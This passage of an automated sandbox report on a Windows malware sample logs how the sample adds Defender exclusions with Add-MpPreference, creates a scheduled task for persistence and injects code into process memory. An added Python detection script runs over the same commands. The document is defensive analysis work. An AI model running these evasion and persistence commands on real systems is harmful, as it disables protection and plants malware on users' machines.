                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Memory written: C:\Users\user\AppData\Roaming\jdSldfVS.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_004120F7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00419627 mouse_event
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp"
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process created: C:\Users\user\AppData\Roaming\jdSldfVS.exe "C:\Users\user\AppData\Roaming\jdSldfVS.exe" (3 identical entries)
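The process-creation entries above carry three reusable tells: a Defender exclusion added with Add-MpPreference for a path under the user's profile, a scheduled task created from an XML file in the user's Temp directory, and a process re-spawning its own image from a user-writable directory (the pattern that precedes the "Memory written ... value starts with: 4D5A" entry). The Python below is an added example, not part of the report or of any vendor tooling: it runs those three checks over constructed process-creation records modelled on the entries above. The field names parent/image/cmdline are an assumption (map them from your Sysmon Event ID 1 or EDR schema), the -EncodedCommand variant and the benign Get-MpPreference record are constructed, and the severities are illustrative.

```python
# Added example (not from the report): three process-creation detections derived from
# the "Process created" entries above, run over constructed records.
import base64
import re

# Constructed records modelled on the report's entries. Field names are an assumption.
SAMPLE_EVENTS = [
    {
        "parent": r"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe",
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                   r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"',
    },
    {
        "parent": r"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe",
        "image": r"C:\Windows\SysWOW64\schtasks.exe",
        "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" '
                   r'/XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"',
    },
    {
        "parent": r"C:\Users\user\AppData\Roaming\jdSldfVS.exe",
        "image": r"C:\Users\user\AppData\Roaming\jdSldfVS.exe",
        "cmdline": r'"C:\Users\user\AppData\Roaming\jdSldfVS.exe"',
    },
    {   # constructed: the same cmdlet hidden behind -EncodedCommand (base64 of UTF-16LE)
        "parent": r"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe",
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -enc " + base64.b64encode(
            r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming"'.encode("utf-16le")
        ).decode(),
    },
    {   # constructed benign baseline: an admin reading the current preferences
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-MpPreference',
    },
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
MP_EXCLUSION = re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)", re.I | re.S)
XML_ARG = re.compile(r'/xml\s+"?([^"\s]+)', re.I)


def effective_cmdline(cmdline):
    """Append the decoded -EncodedCommand payload (base64, UTF-16LE) so rules see the
    cmdlet whether it was passed in clear text or encoded."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:            # binascii.Error is a ValueError subclass
        return cmdline
    return cmdline + "\n" + decoded


def classify(event):
    """Apply the three rules to one process-creation event; returns [(rule, severity)]."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = effective_cmdline(event["cmdline"])
    findings = []

    # 1. Defender exclusion added; high when the excluded path or the parent lives
    #    under a user profile directory (self-exclusion by a dropped binary).
    if image.endswith("powershell.exe") and MP_EXCLUSION.search(cmd):
        sev = "high" if (USER_WRITABLE.search(cmd) or USER_WRITABLE.search(parent)) else "medium"
        findings.append(("defender_exclusion_added", sev))

    # 2. schtasks /Create with a task definition read from a temp directory.
    if image.endswith("schtasks.exe") and re.search(r"/create\b", cmd, re.I):
        m = XML_ARG.search(cmd)
        if m and TEMP_DIR.search(m.group(1)):
            findings.append(("schtasks_xml_from_temp", "high"))

    # 3. A binary in a user-writable directory spawning a copy of itself
    #    (the staging step before the in-memory PE overwrite seen above).
    if image == parent and USER_WRITABLE.search(image):
        findings.append(("self_respawn_from_user_dir", "medium"))
    return findings


def triage(events):
    """Map event index -> findings, dropping events with no hits."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"].rsplit("\\", 1)[-1], hits)
```

On a live host, the current exclusion set is confirmed with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` and an entry is removed with `Remove-MpPreference -ExclusionPath <path>`; both are standard cmdlets of the Defender PowerShell module. Note that the third rule is deliberately rated medium: legitimate installers and updaters also re-launch themselves, so it is a correlation signal for the other two, not an alert on its own.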
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerPV\9`
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerPV\]`
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerPV\13B`
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerPV\
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerB~P
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.dr | Binary or memory string: [Program Manager]
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00434C52 cpuid
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00452036 EnumSystemLocalesW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_004520C3 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00452313 GetLocaleInfoW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00448404 EnumSystemLocalesW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0045243C GetLocaleInfoW,GetLocaleInfoW,GetACP
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00452543 GetLocaleInfoW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00452610 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040F8D1 GetLocaleInfoA
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_004488ED GetLocaleInfoW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00451CD8 IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00451F50 EnumSystemLocalesW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00451F9B EnumSystemLocalesW
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Queries volume information: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe VolumeInformation
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 identical entries)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 identical entries)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 identical entries)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Users\user\AppData\Roaming\jdSldfVS.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040B164 GetLocalTime,wsprintfW,17_2_0040B164
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041B60D GetUserNameW,17_2_0041B60D
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,17_2_00449190
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

Source: Yara match | File source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
